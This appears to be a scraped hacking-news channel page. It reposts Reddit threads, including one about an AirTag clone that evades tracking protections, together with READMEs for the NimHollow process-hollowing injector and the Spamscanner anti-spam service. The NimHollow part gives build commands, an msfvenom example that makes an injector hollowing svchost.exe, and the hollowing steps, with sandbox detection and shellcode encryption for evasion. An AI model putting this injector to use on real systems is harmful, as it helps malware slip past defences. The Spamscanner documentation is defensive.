Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Find You: Airtag clone that can already bypass all Apple planned tracking protection features
https://external-preview.redd.it/lq0kE4jjGLLNl2QFzHXB6R3nacwt4ogAfxYcVCgewE0.jpg?width=640&crop=smart&auto=webp&s=f63c38e96a52a38d1ec5b8618ac0b21cf3fc9a4c submitted by /u/lgsp
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Find You: Airtag clone that can already bypass all Apple planned tracking protection features
https://external-preview.redd.it/lq0kE4jjGLLNl2QFzHXB6R3nacwt4ogAfxYcVCgewE0.jpg?width=640&crop=smart&auto=webp&s=f63c38e96a52a38d1ec5b8618ac0b21cf3fc9a4c submitted by /u/lgsp
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Find You: Airtag clone that can already bypass all Apple planned...
Posted in r/hacking by u/lgsp • 1 point and 0 comments
hacking: security in practice
My ex has been having into every account I own. I don't know how, and more inoperable, don't know how to stop her. Suggestions?
So I'm not positive, but I don't think this violates rule #4... but my ex called me tonight with very intimate details about my social media conversations, my venmo exchanges(set to private), my emails, and my bank statements.
I put everything I could on the authenticator app, but I think she still broke through on Snap. How in the hell do I put a stop to this? It'll take me days to get through customer support on all this. Even changed all my passwords(didn't remember half of them) and my email on file.
I literally never knew she knew the first fucking thing about all this
submitted by /u/Pound_Me_Too
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
My ex has been having into every account I own. I don't know how, and more inoperable, don't know how to stop her. Suggestions?
So I'm not positive, but I don't think this violates rule #4... but my ex called me tonight with very intimate details about my social media conversations, my venmo exchanges(set to private), my emails, and my bank statements.
I put everything I could on the authenticator app, but I think she still broke through on Snap. How in the hell do I put a stop to this? It'll take me days to get through customer support on all this. Even changed all my passwords(didn't remember half of them) and my email on file.
I literally never knew she knew the first fucking thing about all this
submitted by /u/Pound_Me_Too
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
My ex has been having into every account I own. I don't know how,...
So I'm not positive, but I don't think this violates rule #4... but my ex called me tonight with very intimate details about my social media...
hacking: security in practice
What could be done?
If a country was about to make the internet, an intranet?
submitted by /u/Program514259
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
What could be done?
If a country was about to make the internet, an intranet?
submitted by /u/Program514259
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
What could be done?
If a country was about to make the internet, an intranet?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
NimHollow : Nim Implementation Of Process Hollowing Using Syscalls (PoC)
NimHollow is a Nim Implementation Of Process Hollowing Using Syscalls (PoC). Playing around with the Process Hollowing technique using Nim.
Features
* Direct syscalls for triggering Windows Native API functions with NimlineWhispers or NimlineWhispers2.
* Shellcode encryption/decryption with AES in CTR mode.
* Simple sandbox detection methods from the OSEP course by @offensive-security.
DISCLAIMER. All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
Usage
Installation
~$ git clone –recurse-submodules https://github.com/snovvcrash/NimHollow && cd NimHollow
~$ git submodule update –init –recursive
~$ nimble install winim nimcrypto
~$ pip3 install -r requirements.txt
~$ sudo apt install upx -y
Example
~$ msfvenom -p windows/x64/messagebox TITLE=’MSF’ TEXT=’Hack the Planet!’ EXITFUNC=thread -f raw -o shellcode.bin
~$ python3 NimHollow.py shellcode.bin -i ‘C:\Windows\System32\svchost.exe’ -o injector –upx –rm [–whispers2]
~$ file injector.exe
injector.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Help
usage: NimHollow.py [-h] [-i IMAGE] [-o OUTPUT] [–whispers2] [–debug] [–upx] [–rm] shellcode_bin
positional arguments:
shellcode_bin path to the raw shellcode file
optional arguments:
-h, –help show this help message and exit
-i IMAGE, –image IMAGE
process image to hollow (default “C:\Windows\System32\svchost.exe”)
-o OUTPUT, –output OUTPUT
output filename
–whispers2 use NimlineWhispers2 to generate syscalls.nim
–debug do not strip debug messages from Nim binary
–upx compress Nim binary with upx
–rm remove Nim files after compiling the binary
Process Hollowing In Slides
1. Create the target process (e.g.,
https://blogger.googleusercontent.com/img/a/AVvXsEgvoFkXWLr1vGm2MiK5ZsxzCCx3RCTUqnjwW_Y5Jg-KLMnQ49OAKcYvhy6oj-iTwEMGk_jTU8MmYlAevQVe9FF3XBXZBce65N7KZ940r3K1heHNXR_hd583X8wxQkw2jA7J46mrMjxXd9mhViJe9AVRWWy5wZVRo6jwQ73JIpLJ2jU6p10yuN354Yju=s2013
2. Query created process to extract its base address pointer from PEB (Process Environment Block).
https://blogger.googleusercontent.com/img/a/AVvXsEjJlVeMwYx_TFCk7BVR5RN2JxbSU9LMufIiuYt6Sp3VMcCOfPrLJ4GGFqKYiX52WP-syeI89DwQTmLeDSWwxro6ibFf7-co0aTV_SmqzRWjOuUh3OCw6px-8aBldCPG1ltBGt6ZN9TGkCwHA6X4fHIBLBmU0RU4j2DfnuFPB36x0_b0fKfbLvOBVEJc=s2013
3. Read 8 bytes of memory (for 64-bit architecture) pointed by the image base address pointer in order to get the actual value of the image base address.
https://blogger.googleusercontent.com/img/a/AVvXsEi6GJ_R30CGZiE-NWMuN5iAtx-kvnO0O4d-KB6nVhfsoL3JuJ7K0aAB_L-G-f7XX0XqK6SyJiAOPfEMLA3Ma-6zRQM-dRqgSLX9RUDwq4otPhcVkKciSqaiQIMCnYbhD4QLFZd4UIYIYXZedbT8CgfSpAB6uujGLzvFpdWpOnXk0s8_-Cp8I-Y15oXj=s2013
4. Read 0x200 bytes of the loaded EXE image and parse PE structure to get the EntryPoint address.
https://blogger.googleusercontent.com/img/a/AVvXsEhQEkT-nQJ3mQyVbWG8RV2HPoeG7jMPdfXZD3RNea8xY882PkE0rwOPuZ388sPsyEJBZHS6peZMg3obYpsxhfVVz7EMsmXeYwDQIhu8MDmUksMaDUYGCakNpSthJ3TjDAOcJBjCRkvQT62gzKvg7Y3Xd__GdTpcES2rlJu7a9uGhfvmcG9_Crs1vF8K=s2013
5. Write the shellcode to the EntryPoint address and resume thread execution.
https://blogger.googleusercontent.com/img/a/AVvXsEi5ge4t6U9hKKvnFvUmZbyZ4wAfVJhwWGwSnjeRoyIjo8wP2aoK_68whVae64ZH7wLtjLVzXtS35zfPTrMuG95Pmu0NvzeMFjGgEeiRRtRrWaE3fFYYxY7Ag0levzNS9PQRp13gnqGSZf3JUYtZuUcoi-rxALtxpGk14vNCAOPHkGQKZLhcBCkDuJgA=s2013
Download
___________________________
@hacking_Attack
@Hacking_Video
NimHollow : Nim Implementation Of Process Hollowing Using Syscalls (PoC)
NimHollow is a Nim Implementation Of Process Hollowing Using Syscalls (PoC). Playing around with the Process Hollowing technique using Nim.
Features
* Direct syscalls for triggering Windows Native API functions with NimlineWhispers or NimlineWhispers2.
* Shellcode encryption/decryption with AES in CTR mode.
* Simple sandbox detection methods from the OSEP course by @offensive-security.
DISCLAIMER. All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
Usage
Installation
~$ git clone –recurse-submodules https://github.com/snovvcrash/NimHollow && cd NimHollow
~$ git submodule update –init –recursive
~$ nimble install winim nimcrypto
~$ pip3 install -r requirements.txt
~$ sudo apt install upx -y
Example
~$ msfvenom -p windows/x64/messagebox TITLE=’MSF’ TEXT=’Hack the Planet!’ EXITFUNC=thread -f raw -o shellcode.bin
~$ python3 NimHollow.py shellcode.bin -i ‘C:\Windows\System32\svchost.exe’ -o injector –upx –rm [–whispers2]
~$ file injector.exe
injector.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Help
usage: NimHollow.py [-h] [-i IMAGE] [-o OUTPUT] [–whispers2] [–debug] [–upx] [–rm] shellcode_bin
positional arguments:
shellcode_bin path to the raw shellcode file
optional arguments:
-h, –help show this help message and exit
-i IMAGE, –image IMAGE
process image to hollow (default “C:\Windows\System32\svchost.exe”)
-o OUTPUT, –output OUTPUT
output filename
–whispers2 use NimlineWhispers2 to generate syscalls.nim
–debug do not strip debug messages from Nim binary
–upx compress Nim binary with upx
–rm remove Nim files after compiling the binary
Process Hollowing In Slides
1. Create the target process (e.g.,
svchost.exe) in a suspended state.https://blogger.googleusercontent.com/img/a/AVvXsEgvoFkXWLr1vGm2MiK5ZsxzCCx3RCTUqnjwW_Y5Jg-KLMnQ49OAKcYvhy6oj-iTwEMGk_jTU8MmYlAevQVe9FF3XBXZBce65N7KZ940r3K1heHNXR_hd583X8wxQkw2jA7J46mrMjxXd9mhViJe9AVRWWy5wZVRo6jwQ73JIpLJ2jU6p10yuN354Yju=s2013
2. Query created process to extract its base address pointer from PEB (Process Environment Block).
https://blogger.googleusercontent.com/img/a/AVvXsEjJlVeMwYx_TFCk7BVR5RN2JxbSU9LMufIiuYt6Sp3VMcCOfPrLJ4GGFqKYiX52WP-syeI89DwQTmLeDSWwxro6ibFf7-co0aTV_SmqzRWjOuUh3OCw6px-8aBldCPG1ltBGt6ZN9TGkCwHA6X4fHIBLBmU0RU4j2DfnuFPB36x0_b0fKfbLvOBVEJc=s2013
3. Read 8 bytes of memory (for 64-bit architecture) pointed by the image base address pointer in order to get the actual value of the image base address.
https://blogger.googleusercontent.com/img/a/AVvXsEi6GJ_R30CGZiE-NWMuN5iAtx-kvnO0O4d-KB6nVhfsoL3JuJ7K0aAB_L-G-f7XX0XqK6SyJiAOPfEMLA3Ma-6zRQM-dRqgSLX9RUDwq4otPhcVkKciSqaiQIMCnYbhD4QLFZd4UIYIYXZedbT8CgfSpAB6uujGLzvFpdWpOnXk0s8_-Cp8I-Y15oXj=s2013
4. Read 0x200 bytes of the loaded EXE image and parse PE structure to get the EntryPoint address.
https://blogger.googleusercontent.com/img/a/AVvXsEhQEkT-nQJ3mQyVbWG8RV2HPoeG7jMPdfXZD3RNea8xY882PkE0rwOPuZ388sPsyEJBZHS6peZMg3obYpsxhfVVz7EMsmXeYwDQIhu8MDmUksMaDUYGCakNpSthJ3TjDAOcJBjCRkvQT62gzKvg7Y3Xd__GdTpcES2rlJu7a9uGhfvmcG9_Crs1vF8K=s2013
5. Write the shellcode to the EntryPoint address and resume thread execution.
https://blogger.googleusercontent.com/img/a/AVvXsEi5ge4t6U9hKKvnFvUmZbyZ4wAfVJhwWGwSnjeRoyIjo8wP2aoK_68whVae64ZH7wLtjLVzXtS35zfPTrMuG95Pmu0NvzeMFjGgEeiRRtRrWaE3fFYYxY7Ag0levzNS9PQRp13gnqGSZf3JUYtZuUcoi-rxALtxpGk14vNCAOPHkGQKZLhcBCkDuJgA=s2013
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
NimHollow : Nim Implementation Of Process Hollowing Using Syscalls
NimHollow is a Nim Implementation Of Process Hollowing Using Syscalls (PoC). Playing around with the Process Hollowing technique using Nim
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Spamscanner : Spam Scanner Is The Best Anti-Spam, Email Filtering, And Phishing Prevention Service
Spamscanner is a tool and service built by @niftylettuce after hitting countless roadblocks with existing spam-detection solutions. In other words, it’s our current plan for spam.
Our goal is to build and utilize a scalable, performant, simple, easy to maintain, and powerful API for use in our service at Forward Email to limit spam and provide other measures to prevent attacks on our users.
Initially we tried using SpamAssassin, and later evaluated rspamd – but in the end we learned that all existing solutions (even ones besides these) are overtly complex, missing required features or documentation, incredibly challenging to configure; high-barrier to entry, or have proprietary storage backends (that could store and read your messages without your consent) that limit our scalability.
To us, we value privacy and the security of our data and users – specifically we have a “Zero-Tolerance Policy” on storing logs or metadata of any kind, whatsoever (see our Privacy Policy for more on that). None of these solutions honored this privacy policy (without removing essential spam-detection functionality), so we had to create our own tool – thus “Spam Scanner” was born.
The solution we created provides several Features and is completely configurable to your liking. You can learn more about the actual Algorithm below. Contributors are welcome. Features
Spam Scanner includes modern, essential, and performant features that to help reduce spam, phishing, and executable attacks. Naive Bayes Classifier
Our Naive Bayesian classifier is available in this repository, the npm package, and is updated frequently as it gains upstream, anonymous, SHA-256 hashed data from Forward Email.
It was trained with an extremely large dataset of spam, ham, and abuse reporting format (“ARF”) data. This dataset was compiled privately from multiple sources. Spam Content Detection
Provides an out of the box trained Naive Bayesian classifier (uses naivebayes and natural under the hood), which is sourced from hundreds of thousands of spam and ham emails. This classifier relies upon tokenized and stemmed words (with respect to the language of the email as well) into two categories (“spam” and “ham”). Phishing Content Detection
Robust phishing detection approach which prevents domain swapping, IDN homograph attacks, and more. Executable Link and Attachment Detection
Link and attachment detection techniques that checks links in the message, “Content-Type” headers, file extensions, magic number, and prevents homograph attacks on file names – all against a list of executable file extensions. Virus Detection
Using ClamAV, it scans email attachments (including embedded CID images) for trojans, viruses, malware, and/or other malicious threats. NSFW Image Detection
We have plans to add NSFW image detection and opt-in toxicity detection as well. Algorithm
In a nutshell, here is how the Spam Scanner algorithm works:
1. A message is passed to Spam Scanner, known as the “source”.
2. In parallel and asynchronously, the source is passed to functions that detect the following:
* Classification
* Phishing
* Executables
* Arbitrary
* Viruses
3. After all functions complete, if any returned a value indicating it is spam, then the source is considered to be spam. A detailed result object is provided for inspection into the reason(s).
We have extensively documented the API which provides insight into how each of these functions work. Requirements
Note that you can simply use the Spam Scanner API for free at https://spamscanner.net instead of having to independently maintain and self-host your own instance.
DependencyDescriptionNode.jsYou must install Node.js in order to use this project as it is Node.js based. We recommend using nvm and[...]
___________________________
@hacking_Attack
@Hacking_Video
Spamscanner : Spam Scanner Is The Best Anti-Spam, Email Filtering, And Phishing Prevention Service
Spamscanner is a tool and service built by @niftylettuce after hitting countless roadblocks with existing spam-detection solutions. In other words, it’s our current plan for spam.
Our goal is to build and utilize a scalable, performant, simple, easy to maintain, and powerful API for use in our service at Forward Email to limit spam and provide other measures to prevent attacks on our users.
Initially we tried using SpamAssassin, and later evaluated rspamd – but in the end we learned that all existing solutions (even ones besides these) are overtly complex, missing required features or documentation, incredibly challenging to configure; high-barrier to entry, or have proprietary storage backends (that could store and read your messages without your consent) that limit our scalability.
To us, we value privacy and the security of our data and users – specifically we have a “Zero-Tolerance Policy” on storing logs or metadata of any kind, whatsoever (see our Privacy Policy for more on that). None of these solutions honored this privacy policy (without removing essential spam-detection functionality), so we had to create our own tool – thus “Spam Scanner” was born.
The solution we created provides several Features and is completely configurable to your liking. You can learn more about the actual Algorithm below. Contributors are welcome. Features
Spam Scanner includes modern, essential, and performant features that to help reduce spam, phishing, and executable attacks. Naive Bayes Classifier
Our Naive Bayesian classifier is available in this repository, the npm package, and is updated frequently as it gains upstream, anonymous, SHA-256 hashed data from Forward Email.
It was trained with an extremely large dataset of spam, ham, and abuse reporting format (“ARF”) data. This dataset was compiled privately from multiple sources. Spam Content Detection
Provides an out of the box trained Naive Bayesian classifier (uses naivebayes and natural under the hood), which is sourced from hundreds of thousands of spam and ham emails. This classifier relies upon tokenized and stemmed words (with respect to the language of the email as well) into two categories (“spam” and “ham”). Phishing Content Detection
Robust phishing detection approach which prevents domain swapping, IDN homograph attacks, and more. Executable Link and Attachment Detection
Link and attachment detection techniques that checks links in the message, “Content-Type” headers, file extensions, magic number, and prevents homograph attacks on file names – all against a list of executable file extensions. Virus Detection
Using ClamAV, it scans email attachments (including embedded CID images) for trojans, viruses, malware, and/or other malicious threats. NSFW Image Detection
We have plans to add NSFW image detection and opt-in toxicity detection as well. Algorithm
In a nutshell, here is how the Spam Scanner algorithm works:
1. A message is passed to Spam Scanner, known as the “source”.
2. In parallel and asynchronously, the source is passed to functions that detect the following:
* Classification
* Phishing
* Executables
* Arbitrary
* Viruses
3. After all functions complete, if any returned a value indicating it is spam, then the source is considered to be spam. A detailed result object is provided for inspection into the reason(s).
We have extensively documented the API which provides insight into how each of these functions work. Requirements
Note that you can simply use the Spam Scanner API for free at https://spamscanner.net instead of having to independently maintain and self-host your own instance.
DependencyDescriptionNode.jsYou must install Node.js in order to use this project as it is Node.js based. We recommend using nvm and[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Spamscanner : Spam Scanner Is The Best Anti-Spam, Email Filtering.
Spamscanner is a tool and service built by @niftylettuce after hitting countless roadblocks with existing spam-detection solutions.
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials Spamscanner : Spam Scanner Is The Best Anti-Spam, Email Filtering, And Phishing Prevention Service Spamscanner is a tool and service built by @niftylettuce after hitting countless roadblocks with existing spam-detection solutions. In…
installing the latest with
1. Install ClamAV
sudo apt-get update
sudo apt-get install build-essential clamav-daemon clamav-freshclam clamav-unofficial-sigs -qq
sudo service clamav-daemon start
You may need to run
Configure ClamAV:
sudo vim /etc/clamav/clamd.conf
-Example
+#Example
-#StreamMaxLength 10M
+StreamMaxLength 50M
+# this file path may be different on your OS (that’s OK)
-#LocalSocket /tmp/clamd.socket
+LocalSocket /tmp/clamd.socket
sudo vim /etc/clamav/freshclam.conf
-Example
+#Example
Ensure that ClamAV starts on boot:
systemctl enable freshclamd
systemctl enable clamd
systemctl start freshclamd
systemctl start clamd
macOS
1. Install ClamAV:
brew install clamav
Configure ClamAV:
if you are on Intel macOS
sudo mv /usr/local/etc/clamav/clamd.conf.sample /usr/local/etc/clamav/clamd.conf
if you are on M1 macOS (or newer brew which installs to
sudo mv /opt/homebrew/etc/clamav/clamd.conf.sample /opt/homebrew/etc/clamav/clamd.conf
-Example
+#Example
-#StreamMaxLength 10M
+StreamMaxLength 50M
+# this file path may be different on your OS (that’s OK)
-#LocalSocket /tmp/clamd.socket
+LocalSocket /tmp/clamd.socket
if you are on Intel macOS
sudo mv /usr/local/etc/clamav/freshclam.conf.sample /usr/local/etc/clamav/freshclam.conf
if you are on M1 macOS (or newer brew which installs to
sudo mv /opt/homebrew/etc/clamav/freshclam.conf.sample /opt/homebrew/etc/clamav/freshclam.conf
if you are on Intel macOS
sudo vim /usr/local/etc/clamav/freshclam.conf
if you are on M1 macOS (or newer brew which installs to
sudo vim /opt/homebrew/etc/clamav/freshclam.conf
-Example
+#Example
freshclam
Ensure that ClamAV starts on boot:
sudo vim /Library/LaunchDaemons/org.clamav.clamd.plist
Enable it and start it on boot:
sudo launchctl load /Library/LaunchDaemons/org.clamav.clamd.plist
sudo launchctl start /Library/LaunchDaemons/org.clamav.clamd.plist
You may want to periodically run
Install
npm:
npm install spamscanner
Usage
const fs = require(‘fs’);
const path = require(‘path’);
const SpamScanner = require(‘spamscanner’);
const scanner = new SpamScanner();
//
// NOTE: The
// and you can pass it as String, Buffer, or valid file path
//
const source = fs.readFileSync(
path.join(__dirname, ‘test’, ‘fixtures’, ‘spam.eml’)
);
// async/await usage
(async () => {
try {
const scan = await scanner.scan(source);
console.log(‘scan’, scan);
} catch (err) {
console.error(err);
}
});
// then/catch usage
scanner
.scan(source)
.then(scan => console.log(‘scan’, scan))
.catch(console.error);
// callback usage
if (err) return console.error(err);
scanner.scan(source, (err, scan) => {
if (err) return console.error(err);
console.log(‘scan’, scan);
});
API
___________________________
@hacking_Attack
@Hacking_Video
nvm install --lts. If you simply want to use the Spam Scanner API, visit the website at https://spamscanner.net for more information.CloudflareYou can optionally set 1.1.1.3and 1.0.0.3as your DNS servers as we use DNS over HTTPS to perform a lookup on links, with a fallback to the DNS servers set on the system itself if the DNS over HTTPS request fails. We use Cloudflare for Family for detecting phishing and malware links.ClamAVYou must install ClamAV on your system as we use it to scan for viruses. See ClamAV Configuration below. ClamAV Configuration Ubuntu1. Install ClamAV
sudo apt-get update
sudo apt-get install build-essential clamav-daemon clamav-freshclam clamav-unofficial-sigs -qq
sudo service clamav-daemon start
You may need to run
sudo freshclam -vif you receive an error when checking sudo service clamav-daemon status, but it is unlikely and depends on your distro.Configure ClamAV:
sudo vim /etc/clamav/clamd.conf
-Example
+#Example
-#StreamMaxLength 10M
+StreamMaxLength 50M
+# this file path may be different on your OS (that’s OK)
-#LocalSocket /tmp/clamd.socket
+LocalSocket /tmp/clamd.socket
sudo vim /etc/clamav/freshclam.conf
-Example
+#Example
Ensure that ClamAV starts on boot:
systemctl enable freshclamd
systemctl enable clamd
systemctl start freshclamd
systemctl start clamd
macOS
1. Install ClamAV:
brew install clamav
Configure ClamAV:
if you are on Intel macOS
sudo mv /usr/local/etc/clamav/clamd.conf.sample /usr/local/etc/clamav/clamd.conf
if you are on M1 macOS (or newer brew which installs to
/opt/homebrew)sudo mv /opt/homebrew/etc/clamav/clamd.conf.sample /opt/homebrew/etc/clamav/clamd.conf
-Example
+#Example
-#StreamMaxLength 10M
+StreamMaxLength 50M
+# this file path may be different on your OS (that’s OK)
-#LocalSocket /tmp/clamd.socket
+LocalSocket /tmp/clamd.socket
if you are on Intel macOS
sudo mv /usr/local/etc/clamav/freshclam.conf.sample /usr/local/etc/clamav/freshclam.conf
if you are on M1 macOS (or newer brew which installs to
/opt/homebrew)sudo mv /opt/homebrew/etc/clamav/freshclam.conf.sample /opt/homebrew/etc/clamav/freshclam.conf
if you are on Intel macOS
sudo vim /usr/local/etc/clamav/freshclam.conf
if you are on M1 macOS (or newer brew which installs to
/opt/homebrew)sudo vim /opt/homebrew/etc/clamav/freshclam.conf
-Example
+#Example
freshclam
Ensure that ClamAV starts on boot:
sudo vim /Library/LaunchDaemons/org.clamav.clamd.plist
Enable it and start it on boot:
sudo launchctl load /Library/LaunchDaemons/org.clamav.clamd.plist
sudo launchctl start /Library/LaunchDaemons/org.clamav.clamd.plist
You may want to periodically run
freshclamto update the config, or configure a similar plistconfiguration for launchctl.Install
npm:
npm install spamscanner
Usage
const fs = require(‘fs’);
const path = require(‘path’);
const SpamScanner = require(‘spamscanner’);
const scanner = new SpamScanner();
//
// NOTE: The
sourceargument is the full raw email to be scanned// and you can pass it as String, Buffer, or valid file path
//
const source = fs.readFileSync(
path.join(__dirname, ‘test’, ‘fixtures’, ‘spam.eml’)
);
// async/await usage
(async () => {
try {
const scan = await scanner.scan(source);
console.log(‘scan’, scan);
} catch (err) {
console.error(err);
}
});
// then/catch usage
scanner
.scan(source)
.then(scan => console.log(‘scan’, scan))
.catch(console.error);
// callback usage
if (err) return console.error(err);
scanner.scan(source, (err, scan) => {
if (err) return console.error(err);
console.log(‘scan’, scan);
});
API
const scanner = new SpamScanner(options)The SpamScannerclass accepts an optional optionsOb[...]___________________________
@hacking_Attack
@Hacking_Video
Spam Scanner
The Best Anti-Spam, Email Filtering, and Phishing Prevention service
Spam Scanner is a drop-in replacement and the best alternative to SpamAssassin, rspamd, SpamTitan, and more. Built by @niftylettuce.
Hacking Articles Tips Tricks Videos Tutorials
installing the latest with nvm install --lts. If you simply want to use the Spam Scanner API, visit the website at https://spamscanner.net for more information.CloudflareYou can optionally set 1.1.1.3and 1.0.0.3as your DNS servers as we use DNS over HTTPS…
ject of options to configure the spam scanner instance being created. It returns a new instance referred to commonly as a
We have configured the scanner defaults to utilize a default classifier, and sensible options for ensuring scanning works properly.
For a list of all options and their defaults, see the index.js file in the root of this repository.
Accepts a required
This method returns a Promise that resolves with a
The scanned results are returned as an Object with the following properties (descriptions of each property are listed below):
{
is_spam: Boolean,
message: String,
results: {
classification: Object,
phishing: Array,
executables: Array,
arbitrary: Array
},
links: Array,
tokens: Array,
mail: Object
}
PropertyTypeDescription
This method parses the
It then tokenizes and stems the message’s subject, html, a[...]
___________________________
@hacking_Attack
@Hacking_Video
scanner.We have configured the scanner defaults to utilize a default classifier, and sensible options for ensuring scanning works properly.
For a list of all options and their defaults, see the index.js file in the root of this repository.
scanner.scan(source)NOTE: This is most useful method of this API as it returns the scanned results of a scanned message.Accepts a required
source(String, Buffer, or file path) argument which points to (or is) a complete and raw SMTP message (e.g. it includes headers and the full email). Commonly this is known as an “eml” file type and contains the extension .eml, however you can pass a String or Buffer representation instead of a file path.This method returns a Promise that resolves with a
scanObject when scanning is completed. You can also use this method with a second callback argument.The scanned results are returned as an Object with the following properties (descriptions of each property are listed below):
{
is_spam: Boolean,
message: String,
results: {
classification: Object,
phishing: Array,
executables: Array,
arbitrary: Array
},
links: Array,
tokens: Array,
mail: Object
}
PropertyTypeDescription
is_spamBooleanA value of trueis returned if categoryproperty of the results.classificationObject was determined to be "spam", results.phishingwas not empty, or results.executableswas not empty – otherwise its value is falsemessageStringA human-friendly message indicating why the sourcewas classified as spam or ham (e.g. all messages/reasons from results.classification, results.phishing, and results.executablesare joined together)resultsObjectAn Object of properties that provide detailed information about the scan (very useful for debugging)results.classificationObjectAn Object with category(String) and probability(Number) values returned based off the categorization of the sourcefrom the Naive Bayes classifierresults.phishingArrayAn Array of Strings indicating phishing attempts detected on the sourceresults.executablesArrayAn Array of Strings indicating executable attacks detected on the sourceresults.arbitraryArrayAn Array of Strings indicating arbitrary spam-detection mechanisms detected on the sourcelinksArrayAn Array of Strings that include all of the parsed and normalized links detected on the source. This is extremely useful for URL reputation management.tokensArrayDebug only: An Array of tokenized and stemmed words (parsed from the source, with respect to determined locale) used internally (for classification against the classifier) and exposed for debugging. This property is only returned when debugoption in the instance is set to true.mailObjectDebug only: A parsed mailparser.simpleParserobject used internally and exposed for debugging. This property is only returned when debugoption in the instance is set to true. scanner.getTokensAndMailFromSource(source)Accepts a sourceargument (String, Buffer, or file path) to an email message (e.g. a .emlfile). This method will automatically call fs.readFileinternally if the sourceargument is a String and determined to be a valid path.This method parses the
sourceemail message using mailparser’s simpleParserfunction.It then tokenizes and stems the message’s subject, html, a[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
ject of options to configure the spam scanner instance being created. It returns a new instance referred to commonly as a scanner. We have configured the scanner defaults to utilize a default classifier, and sensible options for ensuring scanning works properly.…
nd text parts (with respect to the i18n determined language of the message, e.g.
Currently Spam Scanner supports the following locales for tokenization, stemming, and stopword removal. Note that we select specific tokenizers, stemmers, and stopwords based off the detected language in the
NameLocaleArabic
This method returns a Promise that resolves with a
Note that
This is the core internal method used for building the Bag-of-words model which is then fed to the classifier for categorization.
See classifier.js for an example implementation of this method (e.g. the one used in generating the default classifier dataset).
This method returns a Promise that resolves with the classification determined from naivebayes.
In order to defend against gibberish attack vectors, classification is limited to a limited bag of words approach by. The default value is
We have plans to further refine the classifier to strip all gibberish by testing against Wikimedia (or Google AI) datasets of word dictionaries of every language. This is not an easy feat to pull off, however we have concrete plans for how we will approach this.
This method returns a Promise that resolves with an Array of messages (if any) that indicates that links parsed from the message were detected to be phishing attempts. You can also use this method with a second callback argument.
This method also prevents the common IDN homograph attacks. If any link is detected to start with the string
A common example of this is a link of
This method checks against Cloudflare for Families servers for both adult-related content, malware, and phishing. This means we do two separate DNS over HTTPS requests to
If you are using Cloudflare for Families DNS servers as mentioned in Requirements), then if there are any HTTPS over DNS request errors, it will fallback to use the DNS servers set on the system for lookups[...]
___________________________
@hacking_Attack
@Hacking_Video
en, es, jp, ru, etc). See the getTokensmethod documentation for insight into how language is determined.Currently Spam Scanner supports the following locales for tokenization, stemming, and stopword removal. Note that we select specific tokenizers, stemmers, and stopwords based off the detected language in the
source.NameLocaleArabic
arDanishdaDutchnlEnglishenFinnishfnFarsifaFrenchfrGermandeHungarianhrIndonesianinItalianitJapanesejaNorwegiannb, nnPolishpoPortugueseptSpanishesSwedishsvRomanianroRussianruTamiltaTurkishtrVietnameseviChinesezh This method returns a Promise that resolves with a
{ tokens, mail }Object. You can also use this method with a second callback argument.Note that
tokensis an Array of parsed tokenized and stemmed words, and mailis the simpleParserparsed mail Object.This is the core internal method used for building the Bag-of-words model which is then fed to the classifier for categorization.
See classifier.js for an example implementation of this method (e.g. the one used in generating the default classifier dataset).
scanner.getClassification(tokens)Accepts a tokensArray of tokens parsed from the tokensproperty returned in the Object from scanner.getTokensAndMailFromSource(see above).This method returns a Promise that resolves with the classification determined from naivebayes.
In order to defend against gibberish attack vectors, classification is limited to a limited bag of words approach by. The default value is
20000words per category. In other words the most 20000common spam words and 20000common ham words are used to determine the classification of the original source.We have plans to further refine the classifier to strip all gibberish by testing against Wikimedia (or Google AI) datasets of word dictionaries of every language. This is not an easy feat to pull off, however we have concrete plans for how we will approach this.
scanner.getPhishingResults(mail)Accepts a mailparser.simpleParserparsed mail Object.This method returns a Promise that resolves with an Array of messages (if any) that indicates that links parsed from the message were detected to be phishing attempts. You can also use this method with a second callback argument.
This method also prevents the common IDN homograph attacks. If any link is detected to start with the string
xn--(e.g. after conversion from punycode.toASCII) then it is detected as phishing.A common example of this is a link of
рaypal.comwhich when converted to ASCII is xn--aypal-uye.com– but when rendered it looks almost identical (if not identical) to paypal.com.This method checks against Cloudflare for Families servers for both adult-related content, malware, and phishing. This means we do two separate DNS over HTTPS requests to
1.1.1.2for malware and 1.1.1.3for adult-related content. You can parse the messages results Array for messages that contain “adult-related content” if you need to parse whether or not you want to flag for adult-related content or not on your application.If you are using Cloudflare for Families DNS servers as mentioned in Requirements), then if there are any HTTPS over DNS request errors, it will fallback to use the DNS servers set on the system for lookups[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
nd text parts (with respect to the i18n determined language of the message, e.g. en, es, jp, ru, etc). See the getTokensmethod documentation for insight into how language is determined. Currently Spam Scanner supports the following locales for tokenization…
, which would in turn use Cloudflare for Family DNS. (using DNS over HTTPS with a fallback of dns.resolve4) – and if it returns
We actually helped Cloudflare in August 2020 to update their documentation to note that this result of
Note that this method detects (with respect to executables.json using “Content-Type” header detection, file extension detection, and magic number detection.
This method returns a Promise that resolves with an Array of messages (if any) that indicate that links and/or attachments parsed from the message were dangerous (e.g. contained executable files or links to executable files). You can also use this method with a second callback argument.
This method also takes into consideration that the file extension and name could have a homograph attack by using
It also scans against links in the message itself for links to executables.
Returns an Array of SHA-256 hashed tokenized and stemmed words, with respect to the passed, detected, or default locale. If
Note that this is “smart” in the sense it will parse the “Content-Language” header of the message, the
